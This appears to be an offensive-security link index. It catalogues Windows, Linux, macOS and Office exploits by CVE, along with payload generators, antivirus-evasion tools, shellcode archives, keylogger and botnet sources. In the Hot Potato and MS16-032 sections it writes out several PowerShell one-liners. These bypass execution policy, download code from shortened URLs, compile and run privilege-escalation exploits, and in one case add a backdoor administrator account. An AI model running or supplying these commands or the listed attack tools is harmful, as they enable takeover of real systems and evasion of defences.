Exploits
Exploits¶
https://github.com/zacbrown/PowerKrabsEtw
Generate metasploit payloads that bypass common anti-virus solutions
Random Exploits
Tool for exploration and tracing of the Windows kernel
Abusing File-streams in libc
CVE-2017-7269 Exploit from fuzzbunch
CTF framework and exploit development library
Meltdown/Spectre
Meltdown EXPLOIT POC linux
Windows Spectre PoC
Linux Spectre PoC
Checking mitigations of Meltdown and Spectre
Intel Active Management Technology (AMT):
- https://www.coalfire.com/The-Coalfire-Blog/April-2019/The-Death-Metal-Suite
- https://github.com/Coalfire-Research/DeathMetal
Buffer overflows¶
Best Explanation of Buffer overflow
MacOS/iOS Exploits¶
Exploit in iMessage 7.X.X to install a backdoor
Windows Exploits¶
https://github.com/51x/WHP
https://github.com/nccgroup/winpayloads
https://github.com/SecWiki/windows-kernel-exploits
Exploits:
MS03-026 - Microsoft RPC DCOM Interface Overflow (kaht2.zip)
MS05-039 - Microsoft Plug and Play Service Overflow, Works with SSDP too
MS08-067 - Remote Stack Overflow Vulnerability Exploit (srvscv)
MS10-015/CVE-2010-0232 - Windows NT/2K/XP/2K3/VISTA/2K8/7 x32 ONLY - NtVdmControl()->KiTrap0d local ring0 exploit
CVE: 2010-4398 Elevation of Privileges (UAC Bypass)
MS11-080 - AFD.sys
MS14-058 - TrackPopupMenu Privilege Escalation
MS15-051 - Win32k LPE vulnerability used in APT attack "taihou32"
MS15-134 - Microsoft Windows Media Center Library Parsing RCE Vulnerability aka "self-executing" MCL File
MS11-046/CVE-2011-1249 - Windows x86 (all versions) Afd.sys Privilege Escalation Exploit.MS11-046 - the SYSTEM shell will spawn within the invoking shell/process
MS11-060/CVE-2011-1974 - Windows x86 (XP SP3 / 2003 SP2) Vulnerability in Remote Access Service NDISTAPI Driver
MS11-080/CVE-2011-2005 - XP|2K3 Afd.sys Privilege Escalation Exploit.MS11-080-Add-User - for use in non-interactive meterpreter shell
MS14-002/CVE-2013-5065 - NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 python2exe version demo
MS14-058/CVE-2014-4113 Win7 x32 Kernel Win32k.sys Privilege Escalation Exploit info & Win 8/8.1 Python script info
MS14-040/CVE-2014-1767 AFD.sys dangling pointer - Win7 x32 MS14-40-x32.py exampleinfo
MS14-058/CVE-2014-4113 Windows 2K3/VISTA/2K8/⅞/2k12 PandaHurricane Kernel-Mode Driver exploit example
MS14-070/CVE-2014-4076 - Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation
MS15-010/CVE-2015-0057 Tested Win8.1 x64 - win32k Local Privilege Escalation
MS15-051/CVE-2015-1701 ClientCopyImage Win32k Exploit - exploits improper object handling in the win32k.sys kernel mode driver. x32 Version
MS15-061/CVE-2015-1723 Windows XP/2K3/VISTA/2K8/7 use-after-free vulnerability in the win32k.sys driver.
MS15-076/CVE-2015-2370 - Win⅞.1 Copies a file to any privileged location on disk. More info.
MS16-008/CVE-2015-2553 - Sandboxed Mount Reparse Point Creation Mitigation Bypass Win8.1 Win10
MS16-016/CVE-2015-0051 - Microsoft Windows WebDAV Local Privilege Escalation Vulnerability Win7 x32 info example
MS16-135/CVE-2016-7255 Fancy Bear POC - Requirements: Intel Processor (Haswell or newer) & Windows 10 x64. more info Newer Powershell POC which works on ⅞/8.1/10
KB4018556/CVE-2017-0213 COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP, due to how the COM Marshaller processes interface requests. Should work x32/x64 version of 7,8,10,2k8,2k12,2k16
Eternal Blue (MS17-010)¶
Eternal Blue Exploit
Older Windows Exploits
Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
Hot potato¶
Hot Potato (nbns spoof + wpad + smb ntlm)
Smashed Potato:
Mod to Hot Potato that bypasses Applocker and creates new user and courtesy shell requires .NET 4.x - made a pimp one-liner for easier pwnage. Here
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://is.gd/y6cfKV','%temp%\SmashedPotato.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /out:"%temp%\SmashedPotatoX64.exe" /platform:x64 "%temp%\SmashedPotato.cs" && InstallUtil.exe /logfile= /LogToConsole=false /U %temp%\SmashedPotatoX64.exe
Tater:
Powershell implementation of Hot Potato that gets loaded into memory. (for Win10 change -Trigger 2) Here
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/fVC1Yd'); Invoke-Tater -Trigger 1 -Command ""net user tater Winter2016 /add && net localgroup administrators tater /add"""
MS16-032/CVE-2016-0099¶
Powershell:
powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032"
C# 64bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe
C# 32bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X32.exe" /platform:x32 "%temp%\ms16-032.cs" && %temp%\ms16-032_X32.exe
Protocols¶
FreeBSD Kernel¶
PS4 4.55 BPF Race Condition Kernel Exploit Writeup
PS4 5.05 BPF Double Free Kernel Exploit Writeup
Linux Kernel¶
CVE-2017-11176: A step-by-step Linux Kernel exploitation
CVE-2016-5195: Dirty Cow root privilege write exploit
Exploits:
https://github.com/SecWiki/linux-kernel-exploits
CVE–2018–18955 (Linux 4.15.x-4.19.2) - map_write() in kernel/user_namespace.c allows privilege escalation
CVE–2018–1000001 (glibc <= 2.26)
CVE-2017-1000367 (Sudo 1.8.6p7 - 1.8.20)
CVE-2017-1000112 - a memory corruption due to UFO to non-UFO path switch
CVE-2017-16995 (Linux < 4.14 - 4.4) - Memory corruption caused by BPF verifier
CVE-2017-16939 (Linux < 4.13.11) - UAF in Netlink socket subsystem – XFRM
CVE-2017-7494 (Samba 3.5.0-4.6.4/4.5.10/4.4.14) - Samba Remote execution
CVE-2017-7308 (Linux < 4.10.6) - a signedness issue in AF_PACKET sockets
CVE-2017-6074 (Linux < 4.9.11) - a double-free in DCCP protocol
CVE-2017-5123 (Linux 4.14.0-rc4+) - 'waitid()'
CVE-2016-9793 (Linux < 4.8.14) - a signedness issue with SO_SNDBUFFORCE and SO_RCVBUFFORCE socket options
CVE-2016-5195 (Linux > 2.6.22) - Dirty Cow
CVE-2016-2384 (Linux < 4.5) - a double-free in USB MIDI driver
CVE-2016-0728 (3.4.0-3.13.1) - pp_key
CVE-2015-7547 (Glibc < 2.9) - glibc getaddrinfo
CVE-2015-1328 (3.13, 3.16.0, 3.19.0) - overlayfs
CVE-2014-5284 (Linux == 2.8) - OSSEC
CVE-2014-4699 (Linux < 3.15.4) - ptrace
CVE-2014-4014 (Linux < 3.14.8) - Local Privilege Escalation
CVE-2014-3153 (Linux == 3.3.2-5, 3.2.13, 3.2.9, 3.2.1-2, 3.1.8, 3.0.1-5, 2.6.32-39, 2.6.9-4, 3.0.0-18) - futex
CVE-2014-0196 (Linux == 2.6.31-39, 3.14-15) - rawmodePTY
CVE-2014-0038 (Linux == 3.4-3.13.1) - timeoutpwn
CVE-2013-2094 (Linux == 3.0.0-3.8.9) - perf_swevent
CVE-2013-1858 (Linux == 3.3-3.8) - clown-newuser
CVE-2013-1763 (Linux < 3.8.3) - __sock_diag_rcv_msg
CVE-2013-0268 (Linux == 2.6.18-39, 3.0-3.7) - msr
CVE-2012-3524 (libdbus < 1.5.x) - libdbus
CVE-2012-0056 (Linux == 2.6.39, 3.0.0-6, 3.1.0) - memodipper
CVE-2010-4347 (Linux == 2.6.0-36) - american-sign-language
CVE-2010-4258 (Linux == 2.6.31-37) - full-nelson
CVE-2010-4073 (Linux == 2.6.0-36) - half_nelson
CVE-2010-3904 (Linux == 2.6.30-36) - rds
CVE-2010-3437 (Linux == 2.6.0-36) - pktcdvd
CVE-2010-3301 (Linux == 2.6.26-34) - ptrace_kmod2
CVE-2010-3081 (Linux == 2.6.0-33) - video4linux
CVE-2010-2959 (Linux == 2.6.18-36) - can_bcm
CVE-2010-1146 (Linux == 2.6.18-34)- reiserfs
CVE-2010-0415 (Linux == 2.6.18-31) - do_pages_move
CVE-2009-3547 (Linux == 2.4.4-37, 2.6.15-31) - pipe.c_32bit
CVE-2009-2698 (Linux == 2.6.1-19) - udp_sendmsg_32bit
CVE-2009-2692 (Linux == 2.4.4-37, 2.6.0-30) - sock_sendpage
CVE-2009-2692 (Linux == 2.4.4-37, 2.6.0-30) - sock_sendpage2
CVE-2009-1337 (Linux == 2.6.25-29)- exit_notify
CVE-2009-1185 (Linux == 2.6.25-29)- udev
CVE-2008-4210 (Linux == 2.6.11-22)- ftrex
CVE-2008-0600 (Linux == 2.6.23-24)- vmsplice2
CVE-2008-0600 (Linux == 2.6.17-24.1) - vmsplice1
CVE-2006-3626 (Linux == 2.6.8-16) - h00lyshit
CVE-2006-2451 (Linux == 2.6.13-17) - raptor_prctl
CVE-2005-0736 (Linux == 2.6.5-11) - krad3
CVE-2005-1263 (Linux == 2.0-2.2.27-rc2, 2.4.0-31-pre1, 2.6.0-12-rc4) - binfmt_elf.c
CVE-2004-1235 (Linux == 2.4.29)- elflbl
CVE-N/A (Linux == 2.6.34-36)- caps_to_root
CVE-2004-0077 (Linux == 2.4.20, 2.2.24-2.4.27) - mremap_pte
Linux Privilege Escalation¶
Office Exploits¶
Office for Mac Macro Payload Generator
Obfuscate Office documents to bypass antimalware detection
Generate Office documents embedded with the DDE, macro-less command execution technique.
Backdoors¶
Backdoor any python script
Injecting fake backdoored updates
Apps¶
How a double-free bug in WhatsApp turns to RCE
HTTP¶
Deliver Encrypted Browser Exploits
Remote Code execution with JBOSS
XSS:
XXS to RCE
Writing Exploits¶
Shellcode Database
Old Shellcode Archive
Malware FUD Cryptor
Writing Malware For Fun and Profit
http://blog.trailofbits.com/2013/05/14/writing-exploits-with-the-elderwood-kit-part-1/
Primer on Return-Oriented Programming
NSA's Metasploit in Python
Shellcode/Obfuscate Code Generator
Shell Code generator and helper
Examples:
Simple linux keylogger in C
Generate Exploits¶
Multi Platform payload generator
MSFvenom Payload Creator
(metasploit) shellcode generator/compiler/listener
Crypt Exploits:
Crypt msfvenom output
Malware Programing¶
Malware techniques used to detect Virtual Machine, Emulation, Debuggers, Sandbox detection.
Injecting Code in to another process and create a thread
Build your own botnet
botnet source codes
Joke Exploits¶
Jurassic Park hacking scene
Man in the Middle JSCrypto Miner for Wifi networks
Morpheus - Funny MITM attacks
TV Exploits¶
https://github.com/RootMyTV/RootMyTV.github.io